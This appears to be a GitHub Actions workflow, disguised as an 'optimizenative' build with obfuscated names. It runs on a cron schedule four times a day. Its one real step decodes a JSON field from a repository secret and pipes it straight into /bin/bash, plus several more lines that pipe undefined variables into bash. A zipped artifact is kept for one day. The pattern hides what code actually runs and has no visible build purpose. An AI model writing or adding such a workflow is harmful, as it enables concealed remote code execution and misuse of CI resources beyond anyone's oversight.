name: optimizenative98
on:
  workflow_dispatch:

  schedule:
    - cron: '48 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: optimizenative98
        env:
          ithei27: ${{ secrets.ithei27 }}
        run: |
          printf '%s' "$ithei27" | jq -r .m07121 | /bin/bash
          echo $pl42 | jq -r .hi03 | /bin/bash
          printf '%s' "$oo896" | jq -r .lu1 | /bin/bash
          echo $gv56 | jq -r .mljp58756 | /bin/bash
          echo $aekx91 | jq -r .bga922 | /bin/bash
          echo $ll65 | jq -r .vw14 | /bin/bash
          printf '%s' "$khjaf98" | jq -r .zczy537 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: h9l8bzPi
          path: "*.zip"
          retention-days: 1
